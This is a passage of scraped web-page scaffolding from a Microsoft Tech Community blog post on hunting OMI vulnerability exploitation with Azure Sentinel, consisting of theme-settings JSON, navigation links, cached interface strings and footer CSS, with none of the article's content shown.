100%,\r\n50%)\",\"controllerHighlightTextColor\":\"var(--lia-yiq-light)\",\"controllerBorderRadius\":\"var(--lia-border-radius-50)\",\"hamburgerColor\":\"var(--lia-nav-controller-icon-color)\",\"hamburgerHoverColor\":\"var(--lia-nav-controller-icon-color)\",\"hamburgerBgColor\":\"transparent\",\"hamburgerBgHoverColor\":\"transparent\",\"hamburgerBorder\":\"none\",\"hamburgerBorderHover\":\"none\",\"collap\r\n-lia-nav-link-color)\",\"collapseMenuDividerOpacity\":0.16,\"__typename\":\"NavbarThemeSettings\"},\"pager\":\r\n{\"textColor\":\"var(--lia-bs-link-color)\",\"textFontWeight\":\"var(--lia-font-weight-md)\",\"textFontSize\":\"var(--lia-bs-font-size-sm)\",\"__typename\":\"PagerThemeSettings\"},\"panel\":{\"bgColor\":\"var(--lia-bs-white)\",\"borderRadius\":\"var(--lia-bs-border-radius)\",\"borderColor\":\"var(--lia-bs-border-color)\",\"boxShadow\":\"none\",\"__typename\":\"PanelThemeSettings\"},\"popover\":\r\n{\"arrowHeight\":\"8px\",\"arrowWidth\":\"16px\",\"maxWidth\":\"300px\",\"minWidth\":\"100px\",\"headerBg\":\"var(--lia-bs-white)\",\"borderColor\":\"var(--lia-bs-border-color)\",\"borderRadius\":\"var(--lia-bs-border-radius)\",\"boxShadow\":\"0 0.5rem\r\n1rem hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),\r\n0.15)\",\"__typename\":\"PopoverThemeSettings\"},\"prism\":{\"color\":\"#000000\",\"bgColor\":\"#f5f2f0\",\"fontFamily\":\"var(--font-family-monospace)\",\"fontSize\":\"var(--lia-bs-font-size-base)\",\"fontWeightBold\":\"var(--lia-bs-font-weight-bold)\",\"fontStyleItalic\":\"italic\",\"tabSize\":2,\"highlightColor\":\"#b3d4fc\",\"commentColor\":\"#62707e\",\"punctuationColor\":\"#6f6f6f\",\"namespaceOpacity\":\"\r\n0%, 
100%,\r\n0.5)\",\"keywordColor\":\"#0076a9\",\"functionColor\":\"#d3284b\",\"variableColor\":\"#c14700\",\"__typename\":\"PrismThemeSettings\"},\"rte\":\r\n{\"bgColor\":\"var(--lia-bs-white)\",\"borderRadius\":\"var(--lia-panel-border-radius)\",\"boxShadow\":\" var(--lia-panel-box-shadow)\",\"customColor1\":\"#bfedd2\",\"customColor2\":\"#fbeeb8\",\"customColor3\":\"#f8cac6\",\"customColor4\":\"#eccafa\",\"customColor5\":\"#c2e0f4\",\"custo\r\n53%, 51%, 0.4)\",\"diffChangedColor\":\"hsla(43, 97%, 63%, 0.4)\",\"diffNoneColor\":\"hsla(0, 0%, 80%,\r\n0.4)\",\"diffRemovedColor\":\"hsla(9, 74%, 47%,\r\n0.4)\",\"specialMessageHeaderMarginTop\":\"40px\",\"specialMessageHeaderMarginBottom\":\"20px\",\"specialMessageItemMarginTop\":\"0\",\"specialMessageIt\r\n-lia-bs-gray-700)\",\"tableBorderStyle\":\"solid\",\"tableCellPaddingX\":\"5px\",\"tableCellPaddingY\":\"5px\",\"tableTextColor\":\"var(--lia-bs-body-color)\",\"tableVerticalAlign\":\"middle\",\"__typename\":\"RteThemeSettings\"},\"tags\":{\"bgColor\":\"var(--lia-bs-gray-200)\",\"bgHoverColor\":\"var(--lia-bs-gray-400)\",\"borderRadius\":\"var(--lia-bs-border-radius-sm)\",\"color\":\"var(--lia-bs-body-color)\",\"hoverColor\":\"var(--lia-bs-body-color)\",\"fontWeight\":\"var(--lia-font-weight-md)\",\"fontSize\":\"var(--lia-font-size-xxs)\",\"textTransform\":\"UPPERCASE\",\"letterSpacing\":\"0.5px\",\"__typename\":\"TagsThemeSettings\"},\"toasts\":\r\n{\"borderRadius\":\"var(--lia-bs-border-radius)\",\"paddingX\":\"12px\",\"__typename\":\"ToastsThemeSettings\"},\"typography\":\r\n{\"fontFamilyBase\":\"Segoe\r\nUI\",\"fontStyleBase\":\"NORMAL\",\"fontWeightBase\":\"400\",\"fontWeightLight\":\"300\",\"fontWeightNormal\":\"400\",\"fontWeightMd\":\"500\",\"fontWeightBold\r\n[{\"source\":\"SERVER\",\"name\":\"Segoe 
UI\",\"styles\":[{\"style\":\"NORMAL\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"300\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"600\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"700\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"ITALIC\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"}],\"assetNames\":[\"SegoeUI-normal-400.woff2\",\"SegoeUI-normal-300.woff2\",\"SegoeUI-normal-600.woff2\",\"SegoeUI-normal-700.woff2\",\"SegoeUI-italic-400.woff2\"],\"__typename\":\"CustomFont\"},{\"source\":\"SERVER\",\"name\":\"MWF Fluent Icons\",\"styles\":\r\n[{\"style\":\"NORMAL\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"}],\"assetNames\":[\"MWFFluentIcons-normal-400.woff2\"],\"__typename\":\"CustomFont\"}],\"__typename\":\"TypographyThemeSettings\"},\"unstyledListItem\":\r\n{\"marginBottomSm\":\"5px\",\"marginBottomMd\":\"10px\",\"marginBottomLg\":\"15px\",\"marginBottomXl\":\"20px\",\"marginBottomXxl\":\"25px\",\"__typename\"\r\n{\"light\":\"#ffffff\",\"dark\":\"#000000\",\"__typename\":\"YiqThemeSettings\"},\"colorLightness\":\r\n{\"primaryDark\":0.36,\"primaryLight\":0.74,\"primaryLighter\":0.89,\"primaryLightest\":0.95,\"infoDark\":0.39,\"infoLight\":0.72,\"infoLighter\":0.85,\"infoLighte\r\nshared/client/components/common/Loading/LoadingDot-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/common/Loading/LoadingDot-1775111751222\",\"value\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 24 of 
38\n\n{\"title\":\"Loading...\"},\"localOverride\":false},\"CachedAsset:quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257\",\"value\":{\"id\":\"BlogMessagePage\",\"container\":{\"id\":\"Common\",\"headerProps\":\r\n{\"backgroundImageProps\":null,\"backgroundColor\":null,\"addComponents\":null,\"removeComponents\":\r\n[\"community.widget.bannerWidget\"],\"componentOrder\":null,\"__typename\":\"QuiltContainerSectionProps\"},\"headerComponentProps\":\r\n{\"community.widget.breadcrumbWidget\":\r\n{\"disableLastCrumbForDesktop\":false}},\"footerProps\":null,\"footerComponentProps\":null,\"items\":[{\"id\":\"blog-article\",\"layout\":\"ONE_COLUMN\",\"bgColor\":null,\"showTitle\":null,\"showDescription\":null,\"textPosition\":null,\"textColor\":null,\"sectionEditLevel\":\"LOC\r\n{\"main\":[{\"id\":\"blogs.widget.blogArticleWidget\",\"className\":\"lia-blog-container\",\"props\":null,\"__typename\":\"QuiltComponent\"}],\"__typename\":\"OneSectionColumns\"}},{\"id\":\"section-1729184836777\",\"layout\":\"MAIN_SIDE\",\"bgColor\":\"transparent\",\"showTitle\":false,\"showDescription\":false,\"textPosition\":\"CENTER\",\"textColor\":\"var\r\n-lia-bs-body-color)\",\"sectionEditLevel\":null,\"bgImage\":null,\"disableSpacing\":null,\"edgeToEdgeDisplay\":null,\"fullHeight\":null,\"showBorder\":null,\"__typename\":\"Ma\r\n{\"main\":[],\"side\":[{\"id\":\"custom.widget.UnregisteredCTAWidget\",\"className\":null,\"props\":\r\n{\"widgetVisibility\":\"anonymousOnly\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false,\"widgetChooser\":\"custom.widget.UnregisteredCT\r\ncomponents/common/EmailVerification-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/common/EmailVerification-1775111751222\",\"value\":{\"email.verification.title\":\"Email 
Verification\r\nRequired\",\"email.verification.message.update.email\":\"To participate in the community, you must first verify your email\r\naddress. The verification email was sent to {email}. To change your email, visit My\r\nSettings.\",\"email.verification.message.resend.email\":\"To participate in the community, you must first verify your email\r\naddress. The verification email was sent to {email}. Resend email.\"},\"localOverride\":false},\"CachedAsset:text:en_US-pages/blogs/BlogMessagePage-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-pages/blogs/BlogMessagePage-1775111751222\",\"value\":{\"title\":\"{contextMessageSubject} |\r\n{communityTitle}\",\"errorMissing\":\"This blog post cannot be found\",\"name\":\"Blog Message Page\",\"section.blog-article.title\":\"Blog Post\",\"archivedMessageTitle\":\"This Content Has Been Archived\",\"section.section-1729184836777.title\":\"\",\"section.section-1729184836777.description\":\"\",\"section.CncIde.title\":\"Blog\r\nPost\",\"section.tifEmD.description\":\"\",\"section.tifEmD.title\":\"\"},\"localOverride\":false},\"CachedAsset:quiltWrapper:o365.prod:Common:1775111735108\"\r\n{\"__typename\":\"CachedAsset\",\"id\":\"quiltWrapper:o365.prod:Common:1775111735108\",\"value\":\r\n{\"id\":\"Common\",\"header\":{\"backgroundImageProps\":\r\n{\"assetName\":null,\"backgroundSize\":\"COVER\",\"backgroundRepeat\":\"NO_REPEAT\",\"backgroundPosition\":\"CENTER_CENTER\",\"lastModified\":null,\"\r\n[{\"id\":\"community.widget.navbarWidget\",\"props\":\r\n{\"showUserName\":true,\"showRegisterLink\":true,\"useIconLanguagePicker\":true,\"useLabelLanguagePicker\":true,\"style\":\r\n{\"boxShadow\":\"var(--lia-bs-box-shadow-sm)\",\"linkFontWeight\":\"400\",\"controllerHighlightColor\":\"hsla(30, 
100%,\r\n50%)\",\"dropdownDividerMarginBottom\":\"10px\",\"hamburgerBorderHover\":\"none\",\"linkFontSize\":\"14px\",\"linkBoxShadowHover\":\"none\",\"backgroundO\r\n-lia-border-radius-50)\",\"hamburgerBgColor\":\"transparent\",\"linkTextBorderBottom\":\"none\",\"hamburgerColor\":\"var(--lia-nav-controller-icon-color)\",\"brandLogoHeight\":\"30px\",\"linkLetterSpacing\":\"normal\",\"linkBgHoverColor\":\"transparent\",\"collapseMenuDividerOpacity\":0.16,\"paddingBottom\r\nsolid var(--lia-bs-border-color)\",\"hamburgerBorder\":\"none\",\"dropdownPaddingX\":\"10px\",\"brandMarginRightSm\":\"10px\",\"linkBoxShadow\":\"none\",\"linkJustifyContent\":\"flex-start\",\"linkColor\":\"var(--lia-bs-body-color)\",\"collapseMenuDividerBg\":\"var(--lia-nav-link-color)\",\"dropdownPaddingTop\":\"10px\",\"controllerTextColor\":\"var(--lia-nav-controller-icon-color)\",\"controllerHighlightTextColor\":\"var(--lia-yiq-dark)\",\"background\":{\"imageAssetName\":\"\",\"color\":\"var(--lia-bs-white)\",\"size\":\"COVER\",\"repeat\":\"NO_REPEAT\",\"position\":\"CENTER_CENTER\",\"imageLastModified\":\"\"},\"linkBorderRadius\":\"var(-\r\n-lia-bs-border-radius-sm)\",\"linkHoverColor\":\"var(--lia-bs-body-color)\",\"position\":\"FIXED\",\"linkBorder\":\"none\",\"linkTextBorderBottomHover\":\"2px solid var(--lia-bs-primary)\",\"brandMarginRight\":\"30px\",\"hamburgerHoverColor\":\"var(--lia-nav-controller-icon-color)\",\"linkBorderHover\":\"none\",\"collapseMenuMarginLeft\":\"20px\",\"linkFontStyle\":\"NORMAL\",\"linkPaddingX\":\"10px\",\"controllerTextHoverColor\":\r\n-lia-nav-controller-icon-hover-color)\",\"paddingTop\":\"15px\",\"linkPaddingY\":\"5px\",\"linkTextTransform\":\"NONE\",\"dropdownBorderColor\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)\",\"controllerBgHoverColor\":\"hsla(var(--lia-bs-black-h), var(--\r\nlia-bs-black-s), var(--lia-bs-black-l), 
0.1)\",\"linkDropdownPaddingX\":\"var(--lia-nav-link-px)\",\"linkBgColor\":\"transparent\",\"linkDropdownPaddingY\":\"9px\",\"controllerIconColor\":\"var(--lia-bs-body-color)\",\"dropdownDividerMarginTop\":\"10px\",\"linkGap\":\"10px\",\"controllerIconHoverColor\":\"var(--lia-bs-body-color)\"},\"links\":{\"sideLinks\":[],\"logoLinks\":[],\"mainLinks\":[{\"children\":\r\n[],\"linkType\":\"INTERNAL\",\"id\":\"gxcuf89792\",\"params\":{},\"routeName\":\"CommunityPage\"},{\"children\":\r\n[],\"linkType\":\"EXTERNAL\",\"id\":\"community-hub-link\",\"url\":\"/Directory\",\"target\":\"SELF\"},{\"children\":\r\n[{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft365-link\",\"params\":\r\n{\"categoryId\":\"microsoft365\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-windows-link\",\"params\":{\"categoryId\":\"Windows\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-security-link\",\"params\":{\"categoryId\":\"microsoft-security\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-teams-link\",\"params\":\r\n{\"categoryId\":\"MicrosoftTeams\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-azure-link\",\"params\":{\"categoryId\":\"Azure\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 25 of 
38\n\ncontent_management-link\",\"params\":{\"categoryId\":\"Content_Management\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoftintune-link\",\"params\":\r\n{\"categoryId\":\"microsoftintune\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-exchange-link\",\"params\":{\"categoryId\":\"Exchange\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-windows-server-link\",\"params\":{\"categoryId\":\"Windows-Server\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-outlook-link\",\"params\":\r\n{\"categoryId\":\"Outlook\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft365-copilot-link\",\"params\":{\"categoryId\":\"Microsoft365Copilot\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"Common_Enntvz-view-all-products-link\",\"url\":\"/Directory\",\"target\":\"SELF\"}],\"linkType\":\"EXTERNAL\",\"id\":\"products-link\",\"url\":\"/\",\"target\":\"SELF\"},\r\n{\"children\":[{\"linkType\":\"INTERNAL\",\"id\":\"Common-education-sector-link\",\"params\":\r\n{\"categoryId\":\"EducationSector\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-partner-community-link\",\"params\":{\"categoryId\":\"PartnerCommunity\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-healthcare-and-life-sciences-link\",\"params\":\r\n{\"categoryId\":\"HealthcareAndLifeSciences\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-i-t-ops-talk-link\",\"params\":{\"categoryId\":\"ITOpsTalk\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-public-sector-link\",\"params\":\r\n{\"categoryId\":\"PublicSector\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoftfor-nonprofits-link\",\"params\":{\"categoryId\":\"MicrosoftforNonprofits\"},\"routeName\":\"CategoryPage\"},\r\n{\"li
nkType\":\"INTERNAL\",\"id\":\"Common-io-t-link\",\"params\":{\"categoryId\":\"IoT\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-mvp-link\",\"params\":{\"categoryId\":\"mvp\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-mechanics-link\",\"params\":\r\n{\"categoryId\":\"MicrosoftMechanics\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-driving-adoption-link\",\"params\":{\"categoryId\":\"DrivingAdoption\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-learn-for-educators-link\",\"params\":{\"categoryId\":\"microsoft-learn-for-educators\"},\"routeName\":\"CategoryPage\"}],\"linkType\":\"EXTERNAL\",\"id\":\"topics-link\",\"url\":\"/\",\"target\":\"SELF\"},\r\n{\"children\":[],\"linkType\":\"EXTERNAL\",\"id\":\"all-blogs-link\",\"url\":\"/Blogs\",\"target\":\"SELF\"},{\"children\":\r\n[],\"linkType\":\"EXTERNAL\",\"id\":\"all-events-link\",\"url\":\"/Events\",\"target\":\"SELF\"},{\"children\":\r\n[{\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub-link\",\"params\":{\"categoryId\":\"skills-hub\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub-Blog\",\"params\":{\"boardId\":\"skills-hub-blog\",\"categoryId\":\"skills-hub\"},\"routeName\":\"BlogBoardPage\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-LD\",\"url\":\"/category/skills-hub?\r\ntab=grouphub\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-dynamics\",\"url\":\"https://docs.microsoft.com/learn/dynamics365/?WT.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-m365\",\"url\":\"https://docs.microsoft.com/learn/m365/?wt.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-security\",\"url\":\"https://docs.microsoft.com/learn/topics/sci/?\r\nwt.mc_id=techcom_header-webpage-m365\",\"target\":\
"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-pp\",\"url\":\"https://docs.microsoft.com/learn/powerplatform/?wt.mc_id=techcom_header-webpage-powerplatform\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-github\",\"url\":\"https://docs.microsoft.com/learn/github/?wt.mc_id=techcom_header-webpage-github\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-teams\",\"url\":\"https://docs.microsoft.com/learn/teams/?\r\nwt.mc_id=techcom_header-webpage-teams\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-net\",\"url\":\"https://docs.microsoft.com/learn/dotnet/?wt.mc_id=techcom_header-webpage-dotnet\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-azure\",\"url\":\"https://docs.microsoft.com/learn/azure/?\r\nWT.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"}],\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub\",\"params\":\r\n{\"categoryId\":\"skills-hub\"},\"routeName\":\"CategoryPage\"},{\"children\":[{\"linkType\":\"INTERNAL\",\"id\":\"Common-community-info-center-link\",\"params\":{\"categoryId\":\"Community-Info-Center\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-usergroups-link\",\"params\":\r\n{\"categoryId\":\"usergroups\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-community-news-desk-link\",\"params\":{\"categoryId\":\"CommunityNewsDesk\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-global-community-initiative-link\",\"params\":{\"categoryId\":\"microsoft-global-community-initiative\"},\"routeName\":\"CategoryPage\"}],\"linkType\":\"INTERNAL\",\"id\":\"Common-gxcuf89792-\r\ncommunity\",\"params\":\r\n{},\"routeName\":\"CommunityPage\"}]},\"showSearchIcon\":true,\"languagePickerStyle\":\"iconAndLabel\"},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"community.widget.breadcrumbWidget\",\"props\":{\"backgroundColor\":\"transparent\",\"
linkHighlightColor\":\"var(--lia-bs-primary)\",\"visualEffects\":{\"showBottomBorder\":true},\"linkTextColor\":\"var(--lia-bs-gray-700)\"},\"__typename\":\"QuiltComponent\"},{\"id\":\"custom.widget.CommunityBanner\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"usePageWidth\":false,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"Qu\r\n{\"id\":\"custom.widget.ChatbotWidget\",\"props\":\r\n{\"customComponentId\":\"custom.widget.ChatbotWidget\",\"cDisplay_form\":true,\"useBackground\":false},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"custom.widget.HeroBanner\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"usePageWidth\":false,\"useTitle\":true,\"cMax_items\":3,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false,\"w\r\n{\"backgroundImageProps\":\r\n{\"assetName\":null,\"backgroundSize\":\"COVER\",\"backgroundRepeat\":\"NO_REPEAT\",\"backgroundPosition\":\"CENTER_CENTER\",\"lastModified\":null,\"\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 26 of 38\n\n[{\"id\":\"custom.widget.SocialSharing\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"custom.widget.MicrosoftFooter\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"QuiltComponent\"}],\"__ty\r\ncomponents/common/ActionFeedback-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/common/ActionFeedback-1775111751222\",\"value\":\r\n{\"joinedGroupHub.title\":\"Welcome\",\"joinedGroupHub.message\":\"You are now a member of this group and are subscribed\r\nto updates.\",\"groupHubInviteNotFound.title\":\"Invitation Not Found\",\"groupHubInviteNotFound.message\":\"Sorry, we 
could\r\nnot find your invitation to the group. The owner may have canceled the invite.\",\"groupHubNotFound.title\":\"Group Not\r\nFound\",\"groupHubNotFound.message\":\"The grouphub you tried to join does not exist. It may have been\r\ndeleted.\",\"existingGroupHubMember.title\":\"Already Joined\",\"existingGroupHubMember.message\":\"You are already a\r\nmember of this group.\",\"accountLocked.title\":\"Account Locked\",\"accountLocked.message\":\"Your account has been locked\r\ndue to multiple failed attempts. Try again in {lockoutTime} minutes.\",\"editedGroupHub.title\":\"Changes\r\nSaved\",\"editedGroupHub.message\":\"Your group has been\r\nupdated.\",\"leftGroupHub.title\":\"Goodbye\",\"leftGroupHub.message\":\"You are no longer a member of this group and will not\r\nreceive future updates.\",\"deletedGroupHub.title\":\"Deleted\",\"deletedGroupHub.message\":\"The group has been\r\ndeleted.\",\"groupHubCreated.title\":\"Group Created\",\"groupHubCreated.message\":\"{groupHubName} is ready to\r\nuse\",\"accountClosed.title\":\"Account Closed\",\"accountClosed.message\":\"The account has been closed and you will now be\r\nredirected to the homepage\",\"resetTokenExpired.title\":\"Reset Password Link has\r\nExpired\",\"resetTokenExpired.message\":\"Try resetting your password again\",\"invalidUrl.title\":\"Invalid\r\nURL\",\"invalidUrl.message\":\"The URL you're using is not recognized. Verify your URL and try\r\nagain.\",\"accountClosedForUser.title\":\"Account Closed\",\"accountClosedForUser.message\":\"{userName}'s account is\r\nclosed\",\"inviteTokenInvalid.title\":\"Invitation Invalid\",\"inviteTokenInvalid.message\":\"Your invitation to the community has\r\nbeen canceled or expired.\",\"inviteTokenError.title\":\"Invitation Verification Failed\",\"inviteTokenError.message\":\"The url you\r\nare utilizing is not recognized. 
Verify your URL and try again\",\"pageNotFound.title\":\"Access\r\nDenied\",\"pageNotFound.message\":\"You do not have access to this area of the community or it doesn't\r\nexist\",\"eventAttending.title\":\"Responded as Attending\",\"eventAttending.message\":\"You'll be notified when there's new\r\nactivity and reminded as the event approaches\",\"eventInterested.title\":\"Responded as\r\nInterested\",\"eventInterested.message\":\"You'll be notified when there's new activity and reminded as the event\r\napproaches\",\"eventNotFound.title\":\"Event Not Found\",\"eventNotFound.message\":\"The event you tried to respond to does\r\nnot exist.\",\"redirectToRelatedPage.title\":\"Showing Related Content\",\"redirectToRelatedPageForBaseUsers.title\":\"Showing\r\nRelated Content\",\"redirectToRelatedPageForBaseUsers.message\":\"The content you are trying to access is\r\narchived\",\"redirectToRelatedPage.message\":\"The content you are trying to access is\r\narchived\",\"relatedUrl.archivalLink.flyoutMessage\":\"The content you are trying to access is archived View 
Archived\r\nContent\"},\"localOverride\":false},\"CachedAsset:component:custom.widget.CommunityBanner-en-us-1774591586939\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.CommunityBanner-en-us-1774591586939\",\"value\":\r\n{\"component\":{\"id\":\"custom.widget.CommunityBanner\",\"template\":\r\n{\"id\":\"CommunityBanner\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":null,\"defaults\":{\"config\":{\"applicablePages\":\r\n[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.CommunityBanner\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":null,\"form\":null},\"localOverride\":\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.ChatbotWidget-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.ChatbotWidget\",\"template\":\r\n{\"id\":\"ChatbotWidget\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":{\"chatbot.references.title\":\"Related\r\nArticles\",\"chatbot.welcome.title\":\"Welcome!\",\"chatbot.welcome.description\":\"I'm here to help you explore and discover\r\ngreat content.\",\"chatbot.welcome.prompt\":\"Ask me a question or choose a suggestion below to get\r\nstarted:\",\"chatbot.welcome.cta\":\"Let's dive in—what would you like to discover today?\",\"chatbot.status.typing\":\"Assistant\r\nis typing…\",\"chatbot.status.error\":\"error\",\"chatbot.error.response\":\"Failed to get response. 
width:\r\n3.125rem;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371 {\\r\\n width: 1.875rem;\\r\\n height:\r\nauto;\\r\\n transition: filter 0.3s ease;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li {\\r\\n width:\r\n3.125rem;\\r\\n height: 3.125rem;\\r\\n padding: 0.5rem;\\r\\n box-sizing: border-box;\\r\\n border: 2px solid white;\\r\\n display:\r\ninline-block;\\r\\n text-align: center;\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n transition: border 0.3s ease; /* Smooth transition\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 32 of 38\n\neffect */\\r\\n border-left: none;\\r\\n border-bottom: none; /* Apply bottom border to only last item\r\n*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411 {\\r\\n background-color: #0474b4;\\r\\n\r\nborder-top-right-radius: 5px; /* Rounded top right corner of first item*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419 {\\r\\n background-color: #3c5c9c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425 {\\r\\n background-color: #000;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431 {\\r\\n background-color: #fc4404;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437 {\\r\\n background-color: #f0f2f5;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443 {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of\r\nlast item*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to the last item */\\r\\n 
